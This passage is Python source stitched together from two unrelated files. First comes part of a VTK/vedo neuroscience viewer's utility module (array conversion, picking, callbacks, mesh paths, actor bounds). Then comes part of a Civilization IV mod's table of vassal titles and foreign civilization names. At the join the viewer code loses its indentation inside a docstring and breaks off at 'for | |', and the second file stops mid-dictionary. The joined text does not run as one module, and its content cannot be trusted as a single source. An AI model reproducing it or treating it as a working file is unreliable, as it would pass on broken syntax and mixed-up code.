    return f'{name}{spacer}{max(match_count, highest_suffix)}'
def numpy2vtk(arr, dtype=None, deep=True, name=""):
    """
    Convert a numpy array into a vtkDataArray
    :param arr: Array
    :param dtype: Data type. Allows to set a specific data type to the VTK array.
        The special value 'id' produces a vtkIdTypeArray instead.
    :param deep: Whether a deep copy is made. Defaults to True
    :param name: Name of the array
    """
    if arr is None:
        return None
    arr = np.ascontiguousarray(arr)
    if dtype == 'id':
        varr = numpy_to_vtkIdTypeArray(arr.astype(np.int64), deep=deep)
    else:
        if dtype is not None:
            arr = arr.astype(dtype)
        varr = numpy_to_vtk(arr, deep=deep)
    if name:
        varr.SetName(name)
    return varr
def spherical_degree_angles_to_xyz(radius, theta, phi):
    """
    Convert spherical degree angles to XYZ coordinates
    :param radius: Radius
    :param theta: Theta angle value in degrees
    :param phi: Phi angle value in degrees
    :return: List of 3 coordinates
    """
    # Convert degrees to radians before delegating to vedo.
    theta_rad = theta / 180 * math.pi
    phi_rad = phi / 180 * math.pi
    return vedo.spher2cart(radius, theta_rad, phi_rad)
def pick_object(plot, event_name=None, priority=None, cid=None):
    """
    Pick the object under the interactor's current event position and build a
    vedo-style event dictionary describing the hit.
    :param plot: plotter-like object exposing interactor, renderer(s) and picker
    :param event_name: Name of the originating event, stored in the result
    :param priority: Observer priority, stored in the result
    :param cid: Observer callback id, stored in the result
    :return: A ``vedo.utils.dotdict`` describing the pick, or None on early
        return (see the AttributeError handler below)
    """
    x, y = plot.interactor.GetEventPosition()
    plot.renderer = plot.interactor.FindPokedRenderer(x, y)
    if not plot.picker:
        plot.picker = vtk.vtkPropPicker()
    plot.picker.PickProp(x, y, plot.renderer)
    plot.picked2d = (x,y)
    xp, yp = plot.interactor.GetLastEventPosition()
    actor = plot.picker.GetProp3D()
    delta3d = np.array([0,0,0])
    picked3d = None
    picker = plot.picker
    if actor is None:
        # Ok, this is tricky. I found out that vtkPropPicker, even
        # if it optimized, can fail at detecting a simple mesh
        # so we use the vtkPicker as fall back plan
        picker = vtk.vtkPicker()
        picker.Pick(x, y, 0.0, plot.renderer)
        actor = picker.GetProp3D()
    if actor is not None:
        picked3d = np.array(picker.GetPickPosition())
        if isinstance(actor, vedo.Mesh):
            # There is a bug with transparent objects or objects that do not have ForceOpaqueOn()
            # which prevents picked3d from being valid so we have to use another picking method
            cell_picker = vtk.vtkCellPicker()
            cell_picker.Pick(x, y, 0.0, plot.renderer)
            if cell_picker.GetProp3D() == actor:
                picked3d = np.array(cell_picker.GetPickPosition())
        try:
            if actor.picked3d is not None:
                delta3d = picked3d - actor.picked3d
            actor.picked3d = picked3d
        except AttributeError:
            # Actors without a picked3d attribute abort the event entirely;
            # callers receive None in that case.
            return
    else:
        # No 3D prop was hit; fall back to a possible 2D actor.
        actor = plot.picker.GetActor2D()
    dx, dy = x-xp, y-yp
    # Assemble the payload in the shape vedo event callbacks expect.
    event_dict = vedo.utils.dotdict({
        "name": event_name,
        "id": cid,
        "priority": priority,
        "at": plot.renderers.index(plot.renderer),
        "actor": actor,
        "picked3d": picked3d,
        "keyPressed": plot.interactor.GetKeySym(),
        "picked2d": (x,y),
        "delta2d": (dx, dy),
        "angle2d": np.arctan2(dy,dx),
        "speed2d": np.sqrt(dx*dx+dy*dy),
        "delta3d": delta3d,
        "speed3d": np.sqrt(np.dot(delta3d,delta3d)),
        "isPoints": isinstance(actor, vedo.Points),
        "isMesh": isinstance(actor, vedo.Mesh),
        "isAssembly": isinstance(actor, vedo.Assembly),
        "isVolume": isinstance(actor, vedo.Volume),
        "isPicture": isinstance(actor, vedo.Picture),
        "isActor2D": isinstance(actor, vtk.vtkActor2D)
    })
    return event_dict
def add_callback(plot, event_name, func, priority=0.0):
    """
    Modified function from vedo. The issue is that the way vedo (and pyvista for that matter)
    is structured is that it helps using vtk but sometimes hinders using it with code that makes
    assumptions we don't want.
    Add a function to be executed while show() is active.
    Information about the event can be acquired with method ``getEvent()``.
    Return a unique id for the callback.
    The callback function (see example below) exposes a dictionary
    Frequently used events are:
    - KeyPress, KeyRelease: listen to keyboard events
    - LeftButtonPress, LeftButtonRelease: listen to mouse clicks
    - MiddleButtonPress, MiddleButtonRelease
    - RightButtonPress, RightButtonRelease
    - MouseMove: listen to mouse pointer changing position
    - MouseWheelForward, MouseWheelBackward
    - Enter, Leave: listen to mouse entering or leaving the window
    - Pick, StartPick, EndPick: listen to object picking
    - ResetCamera, ResetCameraClippingRange
    - Error, Warning
    - Char
    - Timer
    Check the complete list of events here:
    https://vtk.org/doc/nightly/html/classvtkCommand.html
    """
    if not plot.interactor:
        return None
    # Processing names is removed from vedo function
    # Also the whole thing is refactored with improved picking
    def wrapper(iren=None, event_name=None):
        # `cid` is resolved lazily from the enclosing scope; it is assigned
        # below before any observer can fire.
        event_dict = pick_object(plot, event_name, priority, cid)
        func(event_dict)
    cid = plot.interactor.AddObserver(event_name, wrapper, priority)
    return cid
def get_file_name(file_name, extension):
    """
    Get full file name
    :param file_name: File name without extension
    :param extension: File extension
    :return: File name with extension
    """
    name = str(file_name)
    if name.endswith(extension):
        return name
    return name + '.' + str(extension)
def get_local_data_file_path(file_name, extension, sub_folder=''):
    """
    Get the path of a data file inside the bundled assets folder
    :param file_name: File name without extension
    :param extension: File extension
    :return: File path
    """
    full_name = get_file_name(file_name, extension)
    return ASSETS_FOLDER.joinpath(sub_folder, full_name)
def get_surface_mesh_path(file_name, meshes_path=None, extension='ply', default_meshes_path=None):
    """
    Get a surface mesh file path
    :param file_name: File name without extension
    :param meshes_path: Folder path. If None given, this method will look into the data folder of iblviewer
    :param extension: File extension
    :param default_meshes_path: Fallback local or remote path
    :return: Full mesh file path
    """
    full_name = get_file_name(file_name, extension)
    if meshes_path is not None:
        return str(os.path.join(meshes_path, full_name))
    local_path = str(get_local_data_file_path(file_name, extension, 'surfaces'))
    if os.path.exists(local_path):
        return local_path
    # Local asset missing: fall back to the given path or the GitHub mirror.
    base_path = default_meshes_path
    if base_path is None:
        base_path = 'https://raw.github.com/int-brain-lab/iblviewer/main/iblviewer_assets/surfaces/'
    return base_path + full_name
def load_surface_mesh(file_name, meshes_path=None, extension='ply'):
    """
    Load a surface mesh with vedo.
    :param file_name: File name without extension
    :param meshes_path: Folder path. If None given, this method will look into the data folder of iblviewer
    :param extension: File extension
    :return: Mesh or None if path is invalid
    """
    file_path = get_surface_mesh_path(file_name, meshes_path, extension)
    if os.path.exists(file_path) or file_path.startswith('https'):
        return vedo.load(file_path)
    # Implicitly returns None when the path is neither local nor remote.
def change_file_name(file_path, prefix=None, name=None, suffix=None):
    """
    Change the file name from the given file path
    :param file_path: Input file path
    :param prefix: Prefix to the file name
    :param name: Whether a new name is set instead of the current name.
    If None, the current file name is used.
    :param suffix: Suffix to the file name
    :return: New file path
    """
    folder, current_name, extension = split_path(file_path)
    if prefix is None:
        prefix = ''
    if suffix is None:
        suffix = ''
    # Keep the current name unless a non-empty string replacement is given.
    if not isinstance(name, str) or name == '':
        name = current_name
    return os.path.join(folder, prefix + name + suffix + extension)
def split_path(path):
    """
    Split any given file path into folder path, file name and extension.
    The folder part keeps its trailing separator.
    :return: Folder path, file name and extension
    """
    base_name = os.path.basename(path)
    stem, extension = os.path.splitext(base_name)
    return path[:-len(base_name)], stem, extension
def time_diff(t):
    """
    Get a time difference in seconds
    :param t: Time
    :return: Number of seconds
    """
    return (datetime.now() - t).total_seconds()
def recompute_normals(target):
    """
    Recompute point and cell normals of the given polydata with VTK
    :param target: vtkPolyData
    :return: vtkPolyData with recomputed, consistent normals
    """
    normals_filter = vtk.vtkPolyDataNormals()
    normals_filter.SetInputData(target)
    normals_filter.ComputePointNormalsOn()
    normals_filter.ComputeCellNormalsOn()
    normals_filter.FlipNormalsOff()
    normals_filter.ConsistencyOn()
    normals_filter.Update()
    return normals_filter.GetOutput()
def get_actor_center(actor):
    """
    Get the absolute center position of an actor
    :param actor: VTK actor
    :return: 3d array
    """
    # The previous try/except only re-raised the caught exception, adding
    # nothing; it has been removed.
    if isinstance(actor, vedo.Volume):
        return actor.center() + actor.pos()
    # TODO: check that this is necessary (adding pos)
    return actor.centerOfMass() + actor.pos()
def get_actor_bounds(actor):
    """
    Get the bounds of an actor as xmin, xmax, ymin, ymax, zmin, zmax
    :param actor: VTK actor
    :return: Array with 6 values, or None when actor is None
    """
    if actor is None:
        return
    # The previous try/except only re-raised the caught exception; removed.
    if isinstance(actor, vedo.Volume):
        # NOTE(review): this spans center ± full dimension on each axis,
        # i.e. twice the volume's extent; half-dimensions would give the
        # tight bounding box — confirm intended.
        d = actor.dimensions() * actor.spacing()
        c = get_actor_center(actor)
        return c[0] - d[0], c[0] + d[0], c[1] - d[1], c[1] + d[1], c[2] - d[2], c[2] + d[2]
    return actor.bounds()
def get_actor_dimensions(actor):
    """
    Get the dimensions of an actor
    :param actor: VTK actor
    :return: 3d array, or None when actor is None
    """
    if actor is None:
        return
    # The previous try/except only re-raised the caught exception; removed.
    if isinstance(actor, vedo.Volume):
        # equivalent to self.model.resolution
        return actor.dimensions() * actor.spacing()
    xmin, xmax, ymin, ymax, zmin, zmax = actor.bounds()
    return np.array([xmax - xmin, ymax - ymin, zmax - zmin])
def get_bounding_planes(actor):
    """
    Get bounding planes for an actor
    :param actor: VTK actor
    :return: vtkPlanes
    """
    bounding_planes = vtk.vtkPlanes()
    bounding_planes.SetBounds(actor.GetBounds())
    return bounding_planes
def get_planes_bounds(planes):
"""
Get the bounding box coordinates of a series of planes.
[WARNING] Only works for six planes (box mode) at the moment
:param planes: vtkPlaneCollection
:return: 6 values
"""
origins = list()
for | |
# coding: utf-8
from CvPythonExtensions import *
import CvUtil
import PyHelpers
from Consts import *
from Civics import *
from StoredData import data
from RFCUtils import *
from Areas import *
import CityNameManager as cnm
from Events import handler
from Locations import *
from Core import *
from Core import name as short
from Core import adjective as civAdjective
### Constants ###

# Encoding used when converting localized name strings to byte strings.
encoding = "utf-8"

### Dictionaries with text keys

# Region names inserted into default titles (e.g. "Scandinavia" instead of
# the plain civ name) for civs whose state and homeland names differ.
dDefaultInsertNames = {
    iVikings : "TXT_KEY_CIV_VIKINGS_SCANDINAVIA",
    iKhmer : "TXT_KEY_CIV_KHMER_KAMPUCHEA",
    iNetherlands : "TXT_KEY_CIV_NETHERLANDS_ARTICLE",
    iTamils : "TXT_KEY_CIV_TAMILS_TAMIL_NADU",
    iMaya : "TXT_KEY_CIV_MAYA_YUCATAN",
    iThailand : "TXT_KEY_CIV_THAILAND_SIAM",
    iMoors : "TXT_KEY_CIV_MOORS_MOROCCO",
    iMughals : "TXT_KEY_CIV_MUGHALS_DELHI",
    iHarappa : "TXT_KEY_CIV_HARAPPA_INDUS",
}

# Matching adjectives for the inserted names above (only where they differ
# from the civ's default adjective).
dDefaultInsertAdjectives = {
    iVikings : "TXT_KEY_CIV_VIKINGS_SCANDINAVIAN",
    iKhmer : "TXT_KEY_CIV_KHMER_KAMPUCHEAN",
    iThailand : "TXT_KEY_CIV_THAILAND_SIAMESE",
    iMoors : "TXT_KEY_CIV_MOORS_MOROCCAN",
}
# Vassal titles keyed by master civ, then vassal civ: the text key used for a
# vassal's name when it serves that particular master (e.g. colonies,
# protectorates, satrapies).
dSpecificVassalTitles = deepdict({
    iEgypt : {
        iPhoenicia : "TXT_KEY_CIV_EGYPTIAN_PHOENICIA",
        iEthiopia : "TXT_KEY_CIV_EGYPTIAN_ETHIOPIA",
    },
    iBabylonia : {
        iPhoenicia : "TXT_KEY_ADJECTIVE_TITLE",
    },
    iChina : {
        iKorea : "TXT_KEY_CIV_CHINESE_KOREA",
        iTurks : "TXT_KEY_CIV_CHINESE_TURKS",
        iMongols : "TXT_KEY_CIV_CHINESE_MONGOLIA",
    },
    iGreece : {
        iIndia : "TXT_KEY_CIV_GREEK_INDIA",
        iEgypt : "TXT_KEY_CIV_GREEK_EGYPT",
        iPersia : "TXT_KEY_CIV_GREEK_PERSIA",
        iRome : "TXT_KEY_CIV_GREEK_ROME",
    },
    iIndia : {
        iAztecs: "TXT_KEY_CIV_INDIAN_AZTECS",
    },
    iPersia : {
        iEgypt : "TXT_KEY_CIV_PERSIAN_EGYPT",
        iIndia : "TXT_KEY_CIV_PERSIAN_INDIA",
        iBabylonia : "TXT_KEY_CIV_PERSIAN_BABYLONIA",
        iGreece : "TXT_KEY_CIV_PERSIAN_GREECE",
        iEthiopia : "TXT_KEY_CIV_PERSIAN_ETHIOPIA",
        iArabia : "TXT_KEY_CIV_PERSIAN_ARABIA",
        iMongols : "TXT_KEY_CIV_PERSIAN_MONGOLIA",
    },
    iJapan : {
        iChina : "TXT_KEY_CIV_JAPANESE_CHINA",
        iIndia : "TXT_KEY_CIV_JAPANESE_INDIA",
        iKorea : "TXT_KEY_CIV_JAPANESE_KOREA",
        iMongols : "TXT_KEY_CIV_JAPANESE_MONGOLIA",
    },
    iByzantium : {
        iEgypt : "TXT_KEY_CIV_BYZANTINE_EGYPT",
        iBabylonia : "TXT_KEY_CIV_BYZANTINE_BABYLONIA",
        iGreece : "TXT_KEY_CIV_BYZANTINE_GREECE",
        iPhoenicia : "TXT_KEY_CIV_BYZANTINE_CARTHAGE",
        iPersia : "TXT_KEY_CIV_BYZANTINE_PERSIA",
        iRome : "TXT_KEY_CIV_BYZANTINE_ROME",
        iSpain : "TXT_KEY_CIV_BYZANTINE_SPAIN",
    },
    iVikings : {
        iEngland : "TXT_KEY_CIV_VIKING_ENGLAND",
        iRussia : "TXT_KEY_CIV_VIKING_RUSSIA",
    },
    iArabia : {
        iOttomans : "TXT_KEY_CIV_ARABIAN_OTTOMANS",
        iMughals : "TXT_KEY_CIV_ARABIAN_MUGHALS",
    },
    iMoors : {
        iArabia : "TXT_KEY_CIV_MOORISH_ARABIA",
        iMali : "TXT_KEY_CIV_MOORISH_MALI",
    },
    iSpain : {
        iPhoenicia : "TXT_KEY_CIV_SPANISH_CARTHAGE",
        iEthiopia : "TXT_KEY_CIV_SPANISH_ETHIOPIA",
        iMaya : "TXT_KEY_CIV_SPANISH_MAYA",
        iByzantium : "TXT_KEY_CIV_SPANISH_BYZANTIUM",
        iIndonesia : "TXT_KEY_CIV_SPANISH_INDONESIA",
        iMoors : "TXT_KEY_CIV_SPANISH_MOORS",
        iFrance : "TXT_KEY_CIV_SPANISH_FRANCE",
        iNetherlands : "TXT_KEY_ADJECTIVE_TITLE",
        iMali : "TXT_KEY_CIV_SPANISH_MALI",
        iPortugal : "TXT_KEY_CIV_SPANISH_PORTUGAL",
        iAmerica : "TXT_KEY_CIV_SPANISH_AMERICA",
        iArgentina : "TXT_KEY_CIV_SPANISH_ARGENTINA",
        iColombia : "TXT_KEY_CIV_SPANISH_COLOMBIA",
    },
    iFrance : {
        iEgypt : "TXT_KEY_MANDATE_OF",
        iBabylonia : "TXT_KEY_CIV_FRENCH_BABYLONIA",
        iGreece : "TXT_KEY_CIV_FRANCE_DEPARTEMENTS_OF",
        iPersia : "TXT_KEY_MANDATE_OF",
        iPhoenicia : "TXT_KEY_CIV_FRENCH_PHOENICIA",
        iItaly : "TXT_KEY_CIV_FRENCH_ITALY",
        iEthiopia : "TXT_KEY_CIV_FRENCH_ETHIOPIA",
        iByzantium : "TXT_KEY_CIV_FRENCH_BYZANTIUM",
        iVikings : "TXT_KEY_CIV_FRANCE_DEPARTEMENTS_OF",
        iArabia : "TXT_KEY_MANDATE_OF",
        iEngland : "TXT_KEY_CIV_FRENCH_ENGLAND",
        iSpain : "TXT_KEY_CIV_FRENCH_SPAIN",
        iHolyRome : "TXT_KEY_CIV_FRENCH_HOLY_ROME",
        iRussia : "TXT_KEY_CIV_FRANCE_DEPARTEMENTS_OF",
        iPoland : "TXT_KEY_CIV_FRENCH_POLAND",
        iNetherlands : "TXT_KEY_CIV_FRENCH_NETHERLANDS",
        iMali : "TXT_KEY_CIV_FRENCH_MALI",
        iPortugal : "TXT_KEY_CIV_FRANCE_DEPARTEMENTS_OF",
        iInca : "TXT_KEY_CIV_FRENCH_INCA",
        iAztecs : "TXT_KEY_CIV_FRENCH_AZTECS",
        iMughals : "TXT_KEY_MANDATE_OF",
        iCongo : "TXT_KEY_ADJECTIVE_TITLE",
        iOttomans : "TXT_KEY_MANDATE_OF",
        iAmerica : "TXT_KEY_CIV_FRENCH_AMERICA",
    },
    iEngland : {
        iEgypt : "TXT_KEY_MANDATE_OF",
        iIndia : "TXT_KEY_CIV_ENGLISH_INDIA",
        iBabylonia : "TXT_KEY_CIV_ENGLISH_BABYLONIA",
        iPersia : "TXT_KEY_MANDATE_OF",
        iPhoenicia : "TXT_KEY_CIV_ENGLISH_PHOENICIA",
        iEthiopia : "TXT_KEY_CIV_ENGLISH_ETHIOPIA",
        iMaya : "TXT_KEY_CIV_ENGLISH_MAYA",
        iByzantium : "TXT_KEY_CIV_ENGLISH_BYZANTIUM",
        iVikings : "TXT_KEY_CIV_ENGLISH_VIKINGS",
        iArabia : "TXT_KEY_MANDATE_OF",
        iIndonesia : "TXT_KEY_CIV_ENGLISH_INDONESIA",
        iFrance : "TXT_KEY_CIV_ENGLISH_FRANCE",
        iHolyRome : "TXT_KEY_CIV_ENGLISH_HOLY_ROME",
        iGermany : "TXT_KEY_CIV_ENGLISH_GERMANY",
        iNetherlands : "TXT_KEY_CIV_ENGLISH_NETHERLANDS",
        iMali : "TXT_KEY_CIV_ENGLISH_MALI",
        iOttomans : "TXT_KEY_MANDATE_OF",
        iAmerica : "TXT_KEY_CIV_ENGLISH_AMERICA",
    },
    iHolyRome : {
        iItaly : "TXT_KEY_CIV_HOLY_ROMAN_ITALY",
        iFrance : "TXT_KEY_CIV_HOLY_ROMAN_FRANCE",
        iNetherlands : "TXT_KEY_CIV_HOLY_ROMAN_NETHERLANDS",
        iByzantium : "TXT_KEY_CIV_HOLY_ROMAN_BYZANTIUM",
        iPoland : "TXT_KEY_CIV_HOLY_ROMAN_POLAND",
    },
    iRussia : {
        iTurks : "TXT_KEY_ADJECTIVE_TITLE",
        iPoland : "TXT_KEY_CIV_RUSSIAN_POLAND",
        iAmerica : "TXT_KEY_ADJECTIVE_TITLE",
    },
    iNetherlands : {
        iIndonesia : "TXT_KEY_CIV_DUTCH_INDONESIA",
        iMali : "TXT_KEY_CIV_DUTCH_MALI",
        iEthiopia : "TXT_KEY_CIV_DUTCH_ETHIOPIA",
        iCongo : "TXT_KEY_CIV_DUTCH_CONGO",
        iAmerica : "TXT_KEY_CIV_DUTCH_AMERICA",
        iBrazil : "TXT_KEY_CIV_DUTCH_BRAZIL",
    },
    iPortugal : {
        iIndia : "TXT_KEY_CIV_PORTUGUESE_INDIA",
        # NOTE(review): reuses the ..._INDIA key for Indonesia — possible
        # copy-paste; confirm against the text XML.
        iIndonesia : "TXT_KEY_CIV_PORTUGUESE_INDIA",
        iMali : "TXT_KEY_CIV_PORTUGUESE_MALI",
        iCongo : "TXT_KEY_CIV_PORTUGUESE_CONGO",
        iBrazil : "TXT_KEY_CIV_PORTUGUESE_BRAZIL",
    },
    iMongols : {
        iEgypt : "TXT_KEY_CIV_MONGOL_ILKHANATE",
        iChina : "TXT_KEY_CIV_MONGOL_CHINA",
        iBabylonia : "TXT_KEY_CIV_MONGOL_BABYLONIA",
        iGreece : "TXT_KEY_CIV_MONGOL_ILKHANATE",
        iPersia : "TXT_KEY_CIV_MONGOL_ILKHANATE",
        iPhoenicia : "TXT_KEY_CIV_MONGOL_PHOENICIA",
        iRome : "TXT_KEY_CIV_MONGOL_ILKHANATE",
        iByzantium : "TXT_KEY_CIV_MONGOL_BYZANTIUM",
        iRussia : "TXT_KEY_CIV_MONGOL_RUSSIA",
        iOttomans : "TXT_KEY_CIV_MONGOL_OTTOMANS",
        iMughals : "TXT_KEY_CIV_MONGOL_MUGHALS",
    },
    iMughals : {
        iIndia : "TXT_KEY_CIV_MUGHAL_INDIA",
    },
    iOttomans : {
        iEgypt : "TXT_KEY_CIV_OTTOMAN_EGYPT",
        iBabylonia : "TXT_KEY_CIV_OTTOMAN_BABYLONIA",
        iPersia : "TXT_KEY_CIV_OTTOMAN_PERSIA",
        iGreece : "TXT_KEY_CIV_OTTOMAN_GREECE",
        iPhoenicia : "TXT_KEY_CIV_OTTOMAN_PHOENICIA",
        iEthiopia : "TXT_KEY_CIV_OTTOMAN_ETHIOPIA",
        iByzantium : "TXT_KEY_CIV_OTTOMAN_BYZANTIUM",
        iArabia : "TXT_KEY_CIV_OTTOMAN_ARABIA",
        iIndonesia : "TXT_KEY_CIV_OTTOMAN_INDONESIA",
        iRussia : "TXT_KEY_CIV_OTTOMAN_RUSSIA",
    },
    iGermany : {
        iHolyRome : "TXT_KEY_CIV_GERMAN_HOLY_ROME",
        iMali : "TXT_KEY_CIV_GERMAN_MALI",
        iEthiopia : "TXT_KEY_CIV_GERMAN_ETHIOPIA",
        iPoland : "TXT_KEY_CIV_GERMAN_POLAND",
    },
    iAmerica : {
        iEngland : "TXT_KEY_CIV_AMERICAN_ENGLAND",
        iJapan : "TXT_KEY_CIV_AMERICAN_JAPAN",
        iGermany : "TXT_KEY_CIV_AMERICAN_GERMANY",
        iAztecs : "TXT_KEY_CIV_AMERICAN_MEXICO",
        iMaya : "TXT_KEY_CIV_AMERICAN_MAYA",
        iKorea : "TXT_KEY_CIV_AMERICAN_KOREA",
    },
    iBrazil : {
        iArgentina : "TXT_KEY_CIV_BRAZILIAN_ARGENTINA",
    },
})
# Generic vassal titles by master civ, used when no specific (master, vassal)
# pair is found in dSpecificVassalTitles.
dMasterTitles = {
    iChina : "TXT_KEY_CIV_CHINESE_VASSAL",
    iIndia : "TXT_KEY_CIV_INDIAN_VASSAL",
    iPersia : "TXT_KEY_CIV_PERSIAN_VASSAL",
    iRome : "TXT_KEY_CIV_ROMAN_VASSAL",
    iJapan : "TXT_KEY_CIV_JAPANESE_VASSAL",
    iByzantium : "TXT_KEY_CIV_BYZANTINE_VASSAL",
    iTurks : "TXT_KEY_CIV_TURKIC_VASSAL",
    iArabia : "TXT_KEY_CIV_ARABIAN_VASSAL",
    iTibet : "TXT_KEY_CIV_TIBETAN_VASSAL",
    iIndonesia : "TXT_KEY_CIV_INDONESIAN_VASSAL",
    iMoors : "TXT_KEY_CIV_ARABIAN_VASSAL",
    iSpain : "TXT_KEY_CIV_SPANISH_VASSAL",
    iFrance : "TXT_KEY_ADJECTIVE_TITLE",
    iEngland : "TXT_KEY_CIV_ENGLISH_VASSAL",
    iRussia : "TXT_KEY_CIV_RUSSIAN_VASSAL",
    iNetherlands : "TXT_KEY_ADJECTIVE_TITLE",
    iPortugal : "TXT_KEY_ADJECTIVE_TITLE",
    iMongols : "TXT_KEY_CIV_MONGOL_VASSAL",
    iMughals : "TXT_KEY_CIV_MUGHAL_VASSAL",
    iOttomans : "TXT_KEY_CIV_OTTOMAN_VASSAL",
    iThailand : "TXT_KEY_CIV_THAI_VASSAL",
}
# Generic vassal title used when the master runs a communist government.
dCommunistVassalTitlesGeneric = {
    iRussia : "TXT_KEY_CIV_RUSSIA_SOVIET",
}

# Communist vassal titles for specific (master, vassal) pairs.
dCommunistVassalTitles = deepdict({
    iRussia : {
        iChina : "TXT_KEY_CIV_RUSSIA_SOVIET_REPUBLIC_ADJECTIVE",
        iTurks : "TXT_KEY_CIV_RUSSIA_SOVIET_TURKS",
        iJapan : "TXT_KEY_CIV_RUSSIA_SOVIET_JAPAN",
        iOttomans : "TXT_KEY_CIV_RUSSIA_SOVIET_OTTOMANS",
        iGermany : "TXT_KEY_CIV_RUSSIA_SOVIET_GERMANY",
    },
})

# Generic vassal title used when the master runs a fascist government.
dFascistVassalTitlesGeneric = {
    iGermany : "TXT_KEY_ADJECTIVE_TITLE"
}

# Fascist vassal titles for specific (master, vassal) pairs.
dFascistVassalTitles = deepdict({
    iGermany : {
        iEgypt : "TXT_KEY_CIV_GERMANY_REICHSPROTEKTORAT",
        iChina : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
        iGreece : "TXT_KEY_CIV_GERMANY_NAZI_GREECE",
        iPhoenicia : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
        iRome : "TXT_KEY_CIV_GERMANY_REICHSPROTEKTORAT",
        iEthiopia : "TXT_KEY_CIV_GERMANY_NAZI_ETHIOPIA",
        iByzantium : "TXT_KEY_CIV_GERMANY_NAZI_BYZANTIUM",
        iSpain : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
        iFrance : "TXT_KEY_CIV_GERMANY_NAZI_FRANCE",
        iEngland : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
        iHolyRome : "TXT_KEY_CIV_GERMANY_NAZI_HOLY_ROME",
        iRussia : "TXT_KEY_CIV_GERMANY_NAZI_RUSSIA",
        iNetherlands : "TXT_KEY_CIV_GERMANY_NAZI_NETHERLANDS",
        iMali : "TXT_KEY_CIV_GERMANY_NAZI_MALI",
        iPoland : "TXT_KEY_CIV_GERMANY_NAZI_POLAND",
        iPortugal : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
        iMughals : "TXT_KEY_CIV_GERMANY_NAZI_MUGHALS",
        iOttomans : "TXT_KEY_CIV_GERMANY_REICHSKOMMISSARIAT",
        iCanada : "TXT_KEY_CIV_GERMANY_NAZI_CANADA",
    },
})
# How a civ's adjective is rendered from another civ's perspective, keyed by
# observer civ, then observed civ.
dForeignAdjectives = deepdict({
    iChina : {
        iEgypt : "TXT_KEY_CIV_CHINESE_ADJECTIVE_EGYPT",
        iIndia : "TXT_KEY_CIV_CHINESE_ADJECTIVE_INDIA",
        iBabylonia : "TXT_KEY_CIV_CHINESE_ADJECTIVE_BABYLONIA",
        iPersia : "TXT_KEY_CIV_CHINESE_ADJECTIVE_PERSIA",
        iRome : "TXT_KEY_CIV_CHINESE_ADJECTIVE_ROME",
        iJapan : "TXT_KEY_CIV_CHINESE_ADJECTIVE_JAPAN",
        iKorea : "TXT_KEY_CIV_CHINESE_ADJECTIVE_KOREA",
        iByzantium : "TXT_KEY_CIV_CHINESE_ADJECTIVE_BYZANTIUM",
        iArabia : "TXT_KEY_CIV_CHINESE_ADJECTIVE_ARABIA",
        iKhmer : "TXT_KEY_CIV_CHINESE_ADJECTIVE_KHMER",
        iIndonesia : "TXT_KEY_CIV_CHINESE_ADJECTIVE_INDONESIA",
        iMongols : "TXT_KEY_CIV_CHINESE_ADJECTIVE_MONGOLIA",
        iOttomans : "TXT_KEY_CIV_CHINESE_ADJECTIVE_OTTOMANS",
        iTibet : "TXT_KEY_CIV_CHINESE_ADJECTIVE_TIBET",
    },
})
# How a civ's name is rendered from another civ's perspective, keyed by
# observer civ, then observed civ. Note the Moors deliberately reuse many of
# the Arabian exonyms.
dForeignNames = deepdict({
    iGreece : {
        iTurks : "TXT_KEY_CIV_GREEK_NAME_TURKS",
    },
    iPersia : {
        iByzantium : "TXT_KEY_CIV_PERSIAN_NAME_BYZANTIUM",
        iTurks : "TXT_KEY_CIV_PERSIAN_NAME_TURKS",
        iIndonesia : "TXT_KEY_CIV_PERSIAN_NAME_INDONESIA",
    },
    iRome : {
        iEgypt : "TXT_KEY_CIV_ROMAN_NAME_EGYPT",
        iChina : "TXT_KEY_CIV_ROMAN_NAME_CHINA",
        iBabylonia : "TXT_KEY_CIV_ROMAN_NAME_BABYLONIA",
        iGreece : "TXT_KEY_CIV_ROMAN_NAME_GREECE",
        iPersia : "TXT_KEY_CIV_ROMAN_NAME_PERSIA",
        iPhoenicia : "TXT_KEY_CIV_ROMAN_NAME_PHOENICIA",
        iEthiopia : "TXT_KEY_CIV_ROMAN_NAME_ETHIOPIA",
        iByzantium : "TXT_KEY_CIV_ROMAN_NAME_BYZANTIUM",
        iVikings : "TXT_KEY_CIV_ROMAN_NAME_VIKINGS",
        iTurks : "TXT_KEY_CIV_ROMAN_NAME_TURKS",
        iKhmer : "TXT_KEY_CIV_ROMAN_NAME_KHMER",
        iSpain : "TXT_KEY_CIV_ROMAN_NAME_SPAIN",
        iFrance : "TXT_KEY_CIV_ROMAN_NAME_FRANCE",
        iEngland : "TXT_KEY_CIV_ROMAN_NAME_ENGLAND",
        iHolyRome : "TXT_KEY_CIV_ROMAN_NAME_HOLY_ROME",
        iGermany : "TXT_KEY_CIV_ROMAN_NAME_GERMANY",
        iRussia : "TXT_KEY_CIV_ROMAN_NAME_RUSSIA",
        iNetherlands : "TXT_KEY_CIV_ROMAN_NAME_NETHERLANDS",
        iMali : "TXT_KEY_CIV_ROMAN_NAME_MALI",
        iPortugal : "TXT_KEY_CIV_ROMAN_NAME_PORTUGAL",
        iMongols : "TXT_KEY_CIV_ROMAN_NAME_MONGOLIA",
        iOttomans : "TXT_KEY_CIV_ROMAN_NAME_OTTOMANS",
        iThailand : "TXT_KEY_CIV_ROMAN_NAME_THAILAND",
    },
    iArabia : {
        iEgypt : "TXT_KEY_CIV_ARABIAN_NAME_EGYPT",
        iBabylonia : "TXT_KEY_CIV_ARABIAN_NAME_BABYLONIA",
        iPersia : "TXT_KEY_CIV_ARABIAN_NAME_PERSIA",
        iPhoenicia : "TXT_KEY_CIV_ARABIAN_NAME_CARTHAGE",
        iRome : "TXT_KEY_CIV_ARABIAN_NAME_ROME",
        iEthiopia : "TXT_KEY_CIV_ARABIAN_NAME_ETHIOPIA",
        iByzantium : "TXT_KEY_CIV_ARABIAN_NAME_BYZANTIUM",
        iTurks : "TXT_KEY_CIV_ARABIAN_NAME_TURKS",
        iArabia : "TXT_KEY_CIV_ARABIAN_NAME_ARABIA",
        iIndonesia : "TXT_KEY_CIV_ARABIAN_NAME_INDONESIA",
        iMoors : "TXT_KEY_CIV_ARABIAN_NAME_MOORS",
        iSpain : "TXT_KEY_CIV_ARABIAN_NAME_SPAIN",
